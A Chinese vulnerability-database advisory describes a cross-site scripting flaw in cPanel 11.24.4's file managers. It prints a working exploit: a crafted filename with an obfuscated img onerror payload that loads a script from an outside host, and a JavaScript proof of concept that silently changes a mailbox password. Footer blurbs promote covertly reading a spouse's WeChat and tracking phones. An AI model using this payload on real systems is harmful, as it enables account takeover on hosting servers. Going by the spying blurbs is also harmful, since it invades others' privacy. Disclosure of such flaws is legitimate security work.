cPanel文件管理器文件名HTML注入漏洞
影响版本:
cPanel 11.24.4-CURRENT
漏洞描述:
BUGTRAQ ID: 34142
cPanel是基于web的工具,用于自动化控制网站和服务器。
Cpanel内嵌有两个文件管理器,分别为标准和旧式文件管理器。这两个文件管理器在处理文件名时存在跨站脚本漏洞,远程攻击者可以通过创建特制的文件名注入并执行脚本。
对于旧式文件管理器,只要查看了文件列表就可以执行攻击者的代码;对于标准文件管理器,文件列表经过转义,但如果用户对恶意文件执行了删除、拷贝、移动、重新命名等任务的话,仍可能执行注入的脚本。
由于文件名中禁用斜线字符,因此攻击者无法直接使用<script>标签加载脚本。为了摆脱这个限制,攻击者可以通过<img>标签onError属性注入脚本并将src属性设置为空字符串来强制触发出错事件。通过<img>标签注入的脚本生成<script>标签,使用document.write()函数执行外部脚本。 <*参考
Rizki Wicaksono (rizki.wicaksono@gmail.com)
http://marc.info/?l=bugtraq&m=123730614528241&w=2.
*>
SEBUG安全建议:
厂商补丁:
cPanel
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.cpanel.net.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
恶意文件名:
<img src=\'\' onerror=\'document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99, 111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))\'>
该<img>生成以下html标签,以导致浏览器加载并执行外部脚本:
<script src=http://ilmuhacking.com/x.js></script>
PoC负载:
----------------
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) { // Mozilla, Safari,...
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType(\'text/html\');
}
} else if (window.ActiveXObject) { // IE
try {
http_request = new ActiveXObject(\"Msxml2.XMLHTTP\");
} catch (e) {
try {
http_request = new ActiveXObject(\"Microsoft.XMLHTTP\");
} catch (e) {}
}
}
if (!http_request) {
alert(\'Cannot create XMLHTTP instance\');
return false;
}
http_request.onreadystatechange = alertContents;
http_request.open(\'POST\', url, true);
http_request.setRequestHeader(\"Content-type\", \"application/x-www-form-urlencoded\");
http_request.setRequestHeader(\"Content-length\", parameters.length);
http_request.setRequestHeader(\"Connection\", \"close\");
http_request.send(parameters);
}
function alertContents() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
alert(result);
} else {
alert(\'There was a problem with the request.\');
}
}
}
var poststr = \"quota=\" + encodeURI(\"250\") + \"&password2=\" + encodeURI(\"newpassword\") \\
+
\"&password=\" + encodeURI(\"newpassword\") + \"&email=\" + encodeURI(\"testemail\") +
\"&domain=\" + encodeURI(\"ilmuhacking.com\");
makePOSTRequest(\'/frontend/x3/mail/dopasswdpop.html\', poststr);
相关文章
好评问答原创扶持计划_营业部
好评问答原创扶持计划,2018年11月15日推出,这套计划有效解决网站内容的原创性问题,并对作者的原创数量进行评估,让作者有更多的发展空间。好评原创扶持计划www.jcku.cn好评问答原创扶持计划,...
微信怎么同步聊天记录
很多人都想偷窥另一半的隐私,尤其是女性都是想看老公的微信,有没有跟其他的女孩子聊天或者玩暧昧。但是老公的手机除了在洗澡那一刹那会放在家里面,其他的时间都是随时携带的,想要看到微信了聊天内容非常的困难。...
如何同时接收老公微信_怎样同时接收老公的微信呢?这些方法很实用
生活中家庭需要信任,需要稳定,但是在某种特殊情况之下,就需要了解对方的行为,微信是一个比较大众化的社交软件,很多人的秘密都存在于微信当中。所以想知道对方的行为,就可以看一看对方的微信。如何同时接收老公...
黑客技术教程学习(成为黑客需要学什么)_黑客教程
黑客技术教程学习(成为黑客需要学什么),非常多人的影像是黑客需求用计算机写非常多繁杂的代码。因此,关于小白小白来说,毫无疑问,他会在迷雾中借鉴。因此此次我想跟朋友们共享一动手机的应用方法和黑客方法。并...
我要搜学网,银鹰第二幼儿园怎么样我要搜学网_智学网
建搜学搜课网 这样的网站大概需要多少钱? 要看你想做成什么样的,界面功能没什么要求的话,可以在网上下载开源程序搭建。 服务器肯定是需要的,但不用购买,直接租用就可以了,还需要域名。可以先从小站做...
黑客教你微信定位寻人 查对方手机位置_微信定位
帮助方法的图片位置: 世界很大,但也很危险。 当我们面对危险时,如果警察不能及时到达或站起来,我们就需要学会如何自救和帮助他人。 对于一个高级的死屋网络渗透测试,与朋友分享在头版如何使用照片,学...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!